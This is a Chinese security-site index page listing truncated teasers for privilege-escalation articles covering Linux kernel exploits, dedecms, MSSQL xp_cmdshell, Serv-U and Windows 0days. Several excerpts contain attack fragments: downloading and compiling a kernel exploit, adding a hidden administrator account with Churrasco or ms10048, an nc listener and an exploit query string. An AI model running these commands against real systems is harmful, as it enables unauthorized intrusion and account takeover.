当前位置:站长防黑网防黑文章程序漏洞提权漏洞
提权漏洞
提权漏洞 - linux提权漏洞2014-05-03
linux内核提权的一下又出了几个exp,其中有一个 Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit 和上次的 sock_sendpage 都是google安全team的 Tavis Ormandy 等人发现的。 ... [阅读全文]
提权漏洞 - 瑞星公布360安全卫士"后门"技术细节2013-12-26
瑞星:请奇虎360停止愚弄用户 立即停止安装"后门"  近日,360产品陆续出现严重缺陷:2月1日360安全卫士被爆存在“本地提权”漏洞,截止到2月3日11 时,其产品并未修复,而官方宣称已修复(见 360 的官方报道http:... [阅读全文]
提权漏洞 - dedecms最新漏洞,可提权,201307132013-10-05
截至当前时间2013年7月13日 该漏洞还未进行修复。 影响网站: 所有dedecms 版本 漏洞页面 plus/download.php 漏洞脚本 plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs... [阅读全文]
提权漏洞 - 如何找漏洞,又怎样利用它提权2013-06-21
1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。nc -vv -l -p 本机端口 sqlhelloF.exe 入侵... [阅读全文]
提权漏洞 - 360安全卫士“本地提权”漏洞数月未修复2013-04-11
eNet硅谷动力消息】2月1日,有网友在百度知道搜索发现,奇虎360安全卫士存在本地提权漏洞,经瑞星互联网攻防实验室验证确认,该漏洞确实存在,并影响360安全卫士全部版本。该漏洞在2009年11月曝出后,在长达3个月的时... [阅读全文]
提权漏洞 - 绕过提权漏洞限制的小技巧2013-01-26
文从提升权限漏洞的一系列巧妙的办法来绕过受保护的Mac OS X。有些已经被处于底层控制,但由于它们存在着更多的认证和修补程序,我们不妨让这些提供出来,以便需要的人学习它们。虽然我不只是要利用脚本,而且之后我... [阅读全文]
提权漏洞 - 关于Mysql 的那个提权漏洞2012-12-22
这个:MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day;MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术) 大致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示... [阅读全文]
提权漏洞 - windows虚拟主机提权手册2012-12-02
目前国内大部分网站的现状是建立在各大虚拟主机系统上,独立服务器的站点是越来越少。 所以一旦获取主机的最高权限就能掌握大量的站点,而且虚拟主机又是那么变态,提权基本很难。于是本菜本着授人与鱼不如授人与... [阅读全文]
提权漏洞 - Win8远程桌面漏洞:利用QQ拼音纯净版实现提权2012-11-21
前言 发现这个漏洞的时候, 笔者正在机房上课。正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑。 没想到就随手扫描到一台Win8的系统,而且这个... [阅读全文]
提权漏洞 - servu/serv-u通过替换servudaemon.ini提升权限,结合任意目录遍历漏洞,...2012-05-06
1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。 使用可写帐号登录(如果是匿名ftp,则只有读取权限) C:\Documents and Settings\Administrator>ftp 127.0.0.1 Connected to 127.0.0.1. 220 Serv-U FT... [阅读全文]
提权漏洞 - Linux 2.6.39 到 3.2.0 爆提权漏洞2012-03-10
1.下载漏洞利用文件 wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c 2.编译 gcc mempodipper.c -o mempodipper 3.执行前察看 netcat@netcat:~$ uname -r 3.0.0-12-generic net... [阅读全文]
提权漏洞 - 一个新的Windows内核提权神器2011-06-15
一个新的Windows内核提权神器,据说是华夏小A的作品 个人测试win2003成功 别的请自行测试 有图有真相 没有 xyzh 这个用户 The shell "cmd" success!表现运行成功 OK了 申明一下 我是转载... [阅读全文]
提权漏洞 - 利用Xlight FTP Server提权入侵实例2011-02-15
文章作者:爱无言[导读]在拿下眼前这个网站的时候,心里真是感觉失望透顶,因为现在我所能做的,就是利用一个非常隐蔽的SQL注入点获得的WebShell,在网站所在的目录里打转。 适合读者:入侵爱好者 前置知识:无... [阅读全文]
提权漏洞 - Windows 2008 Server 密码获取攻略2011-02-15
文章作者:simeonWindows 2008 Server在安全上做了重大调整使用过去的老路子行不通,Gethash可能根本运行不了。本人通过实践找到一种组合的破解方法。下面是工作思路和流程:  1.获取shell并提权。在服务器上添加... [阅读全文]
提权漏洞 - Linux 再爆 root 帐号提权漏洞2010-12-14
系统安全高手 Dan Rosenberg 发布了一段 C 程序, 这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 ... [阅读全文]
提权漏洞 - G6FTP的一次入侵提权记录2010-12-12
早在二个小时前,完成了这次有意思的提权,利用户是G6FTP。前台拿Webshell就不说了,动易的后台,进去自定义页面编辑小马生成页面即可,重点是提权。在服务器溜达无意中发现管理员使用的是G6FTP,打开RemoteAdmin目... [阅读全文]
提权漏洞 - Windows7/win2008 提权0day2010-12-12
Windows7/win2008 提权0day<job id="tasksch-wD-0day"><script language="Javascript">crc_table = new Array(0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,0x706AF48F, 0xE963A535, 0x9E6495A3,... [阅读全文]
提权漏洞 - 破解mysql hash 提权技巧2010-11-24
文章作者:foolishqiang mssql的hash保存在表master.dbo.sysxlogins中,用select name,password from master.dbo.sysxlogins可以提取用户hash0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFA... [阅读全文]
提权漏洞 - mysql udf提权失败的另一种方法2010-11-24
实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 "C:\\Documents and Setti... [阅读全文]
提权漏洞 - Windows任务计划程序提权0day2010-11-24
# Exploit Title: Windows Task Scheduler Privilege Escalation 0day # Date: 20-11-2010 # Author: webDEViL # Tested on: Windows 7/2008 x86/x64 代码 <job id="tasksch-wD-0day"> <script language="Java... [阅读全文]
提权漏洞 - Ws2Help.dll提权工具2010-11-23
前几天X一个站的时候,拿到shell权限很小,最后突然发现搜狗拼音目录可写,当时就乐了。b29骇客吧 从朋友那里搞到这个工具,上传到sougou目录,注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。... [阅读全文]
提权漏洞 - PHP 5.x COM functions提权漏洞的利用分析2010-11-20
PHP是英文“超级文本预处理语言”(Hypertext Preprocessor)的缩写,是一种HTML内嵌式的语言。它可以比CGI或者Perl更快速地执行动态网页。PHP具有非常强大的功能,所有的CGI或者JavaScript的功能,PHP都能实现,支... [阅读全文]
提权漏洞 - 常用的Churrasco,pr,ms10048,360提权利用程序介绍演示2010-11-20
1.Churrasco.exe,是win2003 系统下的一个本地提权0day,通过此工具执行命令即可添加管理用户。使用方法:Churrasco.exe "net user hackqing 5427518 /add && net localgroup administrators hackqing /ad... [阅读全文]
提权漏洞 - 搜狗输入法0day漏洞获取系统权限2010-11-20
无意发现了一个很严重的漏洞,和当年3389 输入法漏洞相似。不过暂时不影响未系统未加载搜狗输入法(未登录系统)。如果远程服务器装了 搜狗,登录系统后加载了搜狗,而又未及时注销或kill掉搜狗输入法直接关闭了远... [阅读全文]
提权漏洞 - SQL入侵恢复XP_CMDSHLL与开33892010-11-20
文章作者:lovezy 一,用SQL连接器恢复XP_CMDSHLLE的命令(1)sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc... [阅读全文]
提权漏洞 - 一次Freebsd提权记录2010-11-20
作者:龙儿心[B.H.S.T] 只是简单的记录了下,发上来。高手略过。 朋友发来一个shell,让我看看提权。用angel的马反弹到本地一个shell,普通权限。 Uname –a 发现是freebsd的。 返回内容如下 FreeBSD 50.b... [阅读全文]
提权漏洞 - 沙盒提权的小tips2010-11-20
今天刚好发现有一个SA权限。服务器管理员将大部份扩展都删除了。最后自己重建sp_makewebtask存储才搞到一个webshell了。(重建办法,先找台正常主机,sp_helptext 'sp_makewebtask',将他的SQL语句重新拷到目标机器... [阅读全文]
提权漏洞 - SA权限沙合模式提权方法2010-11-20
sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,也被一些人不断的再次提出来,为了方便自己记忆再写出来,在这种情况下,要执行命令,条件是要有xp_regwrite。 首先开启沙盘模式:exec master..xp... [阅读全文]
提权漏洞 - SQL XPLOG70.DLL文件错误提权2010-10-21
作者:enjoyhack 今天冰鱼发了个shell,说所有安装360并支持aspx,让我提权并给他弄个教程,我拿了他shell还是习惯的上了我自己的大马,自己的用起来还是比较习惯。 拿到shell要提权首先还是看下服务器组件有哪些,... [阅读全文]
提权漏洞 - ms10048本地提权EXP2010-10-17
貌似都很多人都有了....使用:ms10048.exe ma.exems10048.exe net user xx xx /add这个暂不支持X64点击下载ms10048x32 [阅读全文]
总数:14730 上一页1 2 3 4 5下一页
网站首页 关于本站 网站帮助 广告合作 联系我们 免责申明 网站地图  ©2010- zzfhw.com . All rights reserved. 站长防黑网 版权所有